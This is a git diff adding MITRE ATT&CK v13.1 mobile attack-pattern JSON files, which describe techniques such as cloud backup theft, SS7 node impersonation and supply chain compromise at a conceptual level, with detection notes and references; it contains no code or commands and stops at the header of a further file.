@@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--9922d725-ab3d-481a-81e9-a1f4c77e76e0", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--0bcc4ec1-a897-49a9-a9ff-c00df1d1209d", + "type": "attack-pattern", + "created": "2017-10-25T14:48:08.155Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1454", + "external_id": "T1454" + } + ], + "modified": "2019-04-29T19:35:30.985Z", + "name": "Malicious SMS Message", + "description": "Test", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_version": "1.0", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0c71033e-401e-4b97-9309-7a7c95e43a5d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0c71033e-401e-4b97-9309-7a7c95e43a5d.json new file mode 100644 index 0000000000000000000000000000000000000000..312b96383151ff00bf7b34d55cff6f86b2d74d50 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0c71033e-401e-4b97-9309-7a7c95e43a5d.json 
@@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--1d7b0740-0d62-4d60-b8af-d501c7348fe2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--0c71033e-401e-4b97-9309-7a7c95e43a5d", + "created": "2017-10-25T14:48:18.237Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1470", + "url": "https://attack.mitre.org/techniques/T1470" + }, + { + "source_name": "Elcomsoft-EPPB", + "url": "https://www.elcomsoft.com/eppb.html", + "description": "Elcomsoft. (n.d.). Elcomsoft Phone Breaker. Retrieved December 29, 2016." + }, + { + "source_name": "Elcomsoft-WhatsApp", + "url": "https://blog.elcomsoft.com/2017/07/extract-and-decrypt-whatsapp-backups-from-icloud/", + "description": "Oleg Afonin. (2017, July 20). Extract and Decrypt WhatsApp Backups from iCloud. Retrieved July 6, 2018." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-0.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-0" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-1" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.g. Google's Android backup service or Apple's iCloud) could use that access to obtain sensitive data stored in device backups. For example, the Elcomsoft Phone Breaker product advertises the ability to retrieve iOS backup data from Apple's iCloud (Citation: Elcomsoft-EPPB). 
Elcomsoft also describes (Citation: Elcomsoft-WhatsApp) obtaining WhatsApp communication histories from backups stored in iCloud.", + "modified": "2022-04-06T15:54:11.189Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain Device Cloud Backups", + "x_mitre_detection": "Google provides the ability for users to view their account activity. Apple iCloud also provides notifications to users of account activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "remote-service-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3.json new file mode 100644 index 0000000000000000000000000000000000000000..5133bd7a237386098f2010bdac8e833432467e9b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--8c316efa-bb21-4ef7-b06f-714a686784e4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:43:03.218Z", + "name": "Uninstall Malicious Application", + "description": "Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by: \n \n* Abusing device owner permissions to perform silent uninstallation using device owner API calls. \n* Abusing root permissions to delete files from the filesystem. \n* Abusing the accessibility service. This requires sending an intent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can see a list of applications that can use accessibility services in the device settings. 
Application vetting services could look for use of the accessibility service or features that typically require root access.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "created": "2022-03-30T19:31:31.855Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1630/001", + "external_id": "T1630.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html", + "external_id": "APP-43" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d.json new file mode 100644 index 0000000000000000000000000000000000000000..a2b920a096c88ac2f13d13ae7be17e506fc0b8d3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--f0a355c2-bc4a-45d8-95c5-2ec32b7043bf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:42:18.121Z", + "name": "Indicator Removal on Host", + "description": "Adversaries may delete, alter, or hide generated artifacts on a device, including files, jailbreak status, or the malicious application itself. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of mobile security solutions by causing notable events or information to go unreported.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can detect which applications can request device administrator permissions. Users can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. Users can see a list of applications that can use accessibility services in the device settings. 
Application vetting services could look for use of APIs that could indicate the application is trying to hide activity.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "iOS", + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "created": "2022-03-30T19:28:25.541Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1630", + "external_id": "T1630" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html", + "external_id": "APP-43" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad.json new file mode 100644 index 0000000000000000000000000000000000000000..98f892a878b636961c2e99e20aec97b09505df04 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad.json 
@@ -0,0 +1,174 @@ +{ + "type": "bundle", + "id": "bundle--33d18949-c530-4b89-96ae-438a81a5ddd4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:52:29.947Z", + "name": "Supply Chain Compromise", + "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images\n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency, specifically with the widespread usage of third-party advertising libraries.(Citation: Grace-Advertisement)(Citation: NowSecure-RemoteCode)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Usage of insecure or malicious third-party libraries could be detected by application vetting services. 
Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1474", + "external_id": "T1474" + }, + { + "source_name": "Grace-Advertisement", + "description": "M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved December 22, 2016.", + "url": "https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf" + }, + { + "source_name": "NowSecure-RemoteCode", + "description": "Ryan Welton. (2015, June 15). A Pattern for Remote Code Execution using Arbitrary File Writes and MultiDex Applications. 
Retrieved December 22, 2016.", + "url": "https://www.nowsecure.com/blog/2015/06/15/a-pattern-for-remote-code-execution-using-arbitrary-file-writes-and-multidex-applications/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html", + "external_id": "APP-6" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-0.html", + "external_id": "SPC-0" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-1.html", + "external_id": "SPC-1" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-2.html", + "external_id": "SPC-2" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-3.html", + "external_id": "SPC-3" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-4.html", + "external_id": "SPC-4" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-5.html", + "external_id": "SPC-5" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-6.html", + "external_id": "SPC-6" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-7.html", + "external_id": "SPC-7" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-8.html", + "external_id": "SPC-8" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": 
"https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-9.html", + "external_id": "SPC-9" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-10.html", + "external_id": "SPC-10" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-11.html", + "external_id": "SPC-11" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-12.html", + "external_id": "SPC-12" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-13.html", + "external_id": "SPC-13" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-14.html", + "external_id": "SPC-14" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-15.html", + "external_id": "SPC-15" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-16.html", + "external_id": "SPC-16" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-17.html", + "external_id": "SPC-17" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-18.html", + "external_id": "SPC-18" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-19.html", + "external_id": "SPC-19" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": 
"https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-20.html", + "external_id": "SPC-20" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-21.html", + "external_id": "SPC-21" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7.json new file mode 100644 index 0000000000000000000000000000000000000000..41a3538688e1a1e2c29f29336dc082d87752a712 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7.json 
@@ -0,0 +1,84 @@ +{ + "type": "bundle", + "id": "bundle--bbaad56f-2fb0-4040-b993-388e783e3381", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:41:45.256Z", + "name": "Impersonate SS7 Nodes", + "description": "Adversaries may exploit the lack of authentication in signaling system network nodes to track the to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport) \n\n \n\nBy providing the victim\u2019s MSISDN (phone number) and impersonating network internal nodes to query subscriber information from other nodes, adversaries may use data collected from each hop to eventually determine the device\u2019s geographical cell area or nearest cell tower.(Citation: Engel-SS7)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC-WG1-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", + "created": "2022-04-05T19:49:58.938Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1430/002", + "external_id": "T1430.002" + }, + { + "source_name": "3GPP-Security", + "description": "3GPP. (2000, January). 
A Guide to 3rd Generation Security. Retrieved December 19, 2016.", + "url": "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf" + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf" + }, + { + "source_name": "CSRIC-WG1-FinalReport", + "description": "CSRIC-WG1-FinalReport" + }, + { + "source_name": "Positive-SS7", + "description": "Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016.", + "url": "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf" + }, + { + "source_name": "Engel-SS7-2008", + "description": "Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016.", + "url": "https://www.youtube.com/watch?v=q0n5ySqbfdI" + }, + { + "source_name": "Engel-SS7", + "description": "Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016.", + "url": "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html", + "external_id": "CEL-38" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--11bd699b-f2c2-4e48-bf46-fb3f8acd9799.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--11bd699b-f2c2-4e48-bf46-fb3f8acd9799.json new file mode 100644 index 0000000000000000000000000000000000000000..7cf544ff0689dc4d8fd4de8c34b0484a1be751d1 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--11bd699b-f2c2-4e48-bf46-fb3f8acd9799.json @@ -0,0 +1,27 @@ +{ + "type": "bundle", + "id": "bundle--306785f9-17d3-46dc-a4e4-bdf5b8919e54", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--11bd699b-f2c2-4e48-bf46-fb3f8acd9799", + "type": "attack-pattern", + "created": "2017-10-25T14:48:30.462Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1425", + "external_id": "T1425" + } + ], + "modified": "2018-10-17T01:05:10.699Z", + "name": "Insecure Third-Party Libraries", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e.json new file mode 100644 index 0000000000000000000000000000000000000000..a85ae1edd06fa8a6bcf44e9bf4686c20df85e645 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--f97cf624-ea91-4ce2-9c98-64119f34b550", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:56:20.270Z", + "name": "Protected User Data", + "description": "Adversaries may utilize standard operating system APIs to collect data from permission-backed data stores on a device, such as the calendar or contact list. These permissions need to be declared ahead of time. On Android, they must be included in the application\u2019s manifest. On iOS, they must be included in the application\u2019s `Info.plist` file. \n\n \n\nIn almost all cases, the user is required to grant access to the data store that the application is trying to access. In recent OS versions, vendors have introduced additional privacy controls for users, such as the ability to grant permission to an application only while the application is being actively used by the user. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access [Protected User Data](https://attack.mitre.org/techniques/T1636) without the user\u2019s knowledge or approval. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view permissions granted to an application in device settings. Application vetting services typically flag permissions requested by an application, which can be reviewed by an administrator. 
Certain dangerous permissions, such as `RECEIVE_SMS`, could receive additional scrutiny.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "created": "2022-04-01T12:36:41.507Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636", + "external_id": "T1636" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8.json new file mode 100644 index 0000000000000000000000000000000000000000..1ab9c2d8ae0c1cd466bf4b5d984e4ca96c13e6ec --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--f1fc12e5-588b-48ff-97f8-acf672089bc5", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "created": "2022-04-05T20:15:43.636Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1521.002", + "url": "https://attack.mitre.org/techniques/T1521/002" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private that should not be distributed. Due to how asymmetric algorithms work, the sender encrypts data with the receiver\u2019s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA, ElGamal, and ECDSA.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. 
As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1521/002).", + "modified": "2022-04-05T20:16:21.324Z", + "name": "Asymmetric Cryptography", + "x_mitre_detection": "Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2.json new file mode 100644 index 0000000000000000000000000000000000000000..3760ff55120b44ba2893cd5c0a5c5ab5b35059ca --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--dfe1199f-937e-44b1-b741-34dc24e55f39", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:55:03.477Z", + "name": "Software Discovery", + "description": "Adversaries may attempt to get a listing of applications that are installed on a device. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1418) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempts specific actions. \n\n \n\nAdversaries may attempt to enumerate applications for a variety of reasons, such as figuring out what security measures are present or to identify the presence of target applications. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for the Android permission `android.permission.QUERY_ALL_PACKAGES`, and apply extra scrutiny to applications that request it. 
On iOS, application vetting services could look for usage of the private API `LSApplicationWorkspace` and apply extra scrutiny to applications that employ it.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "created": "2017-10-25T14:48:28.067Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1418", + "external_id": "T1418" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html", + "external_id": "APP-12" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19.json new file mode 100644 index 0000000000000000000000000000000000000000..f872c86bc357cadb45925c62d005584b05990b25 --- /dev/null +++ 